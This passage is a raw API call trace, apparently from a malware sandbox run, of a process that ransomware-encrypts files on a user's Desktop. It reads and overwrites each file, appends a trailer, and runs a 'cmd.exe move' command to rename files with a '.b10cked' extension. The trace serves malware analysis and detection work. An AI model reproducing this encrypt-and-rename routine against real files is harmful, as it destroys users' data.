(in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.721] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.721] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.721] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 
[0219.721] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.721] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.721] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.721] ReleaseMutex (hMutex=0xf8) returned 1 [0219.721] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.721] ReleaseMutex (hMutex=0xf8) returned 1 [0219.721] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.721] ReleaseMutex (hMutex=0xf8) returned 1 [0219.721] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.721] ReleaseMutex (hMutex=0xf8) returned 1 [0219.721] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.721] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.721] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.721] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.721] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27651067758) returned 1 [0219.721] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.723] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.723] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.723] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.723] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.723] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xe9e4 [0219.723] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xeecc [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xeecc [0219.724] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.724] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7765, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7765, lpOverlapped=0x0) returned 1 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.724] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7765, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7765, lpOverlapped=0x0) returned 1 [0219.725] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-30565, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7767 [0219.725] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7765, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7765, lpOverlapped=0x0) returned 1 [0219.725] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-30565, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7767 [0219.725] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7765, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7765, lpOverlapped=0x0) returned 1 [0219.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bwuwh.wav", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) 
returned 9 [0219.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bwuwh.wav", cchWideChar=9, lpMultiByteStr=0x131322c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bwuwh.wav", lpUsedDefaultChar=0x0) returned 9 [0219.729] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xeecc [0219.729] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.729] CloseHandle (hObject=0x1b4) returned 1 [0219.730] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav") returned 0x22 [0219.730] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.730] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, 
hThread=0x1b4, dwProcessId=0xe58, dwThreadId=0xed4)) returned 1 [0219.737] CloseHandle (hObject=0x120) returned 1 [0219.737] CloseHandle (hObject=0x1b4) returned 1 [0219.737] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.737] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.737] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.737] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.737] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.737] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.737] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.737] ReleaseMutex (hMutex=0xf8) returned 1 [0219.737] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.737] ReleaseMutex (hMutex=0xf8) returned 1 [0219.737] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.737] ReleaseMutex (hMutex=0xf8) returned 1 [0219.738] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.738] ReleaseMutex (hMutex=0xf8) returned 1 [0219.738] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv" (normalized: "c:\\users\\eebsym5\\desktop\\cklvayow1loaz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.738] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27652709148) returned 1 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1835d [0219.738] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.739] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x17e75 [0219.739] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1835d [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1835d [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.740] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xc1ad, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xc1ad, lpOverlapped=0x0) returned 1 [0219.741] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.741] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xc1ad, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xc1ad, lpOverlapped=0x0) returned 1 [0219.741] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49581, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc1b0 [0219.741] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, 
nNumberOfBytesToRead=0xc1ad, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xc1ad, lpOverlapped=0x0) returned 1 [0219.742] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49581, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc1b0 [0219.742] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xc1ad, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xc1ad, lpOverlapped=0x0) returned 1 [0219.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CKLvAyoW1loaz.flv", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 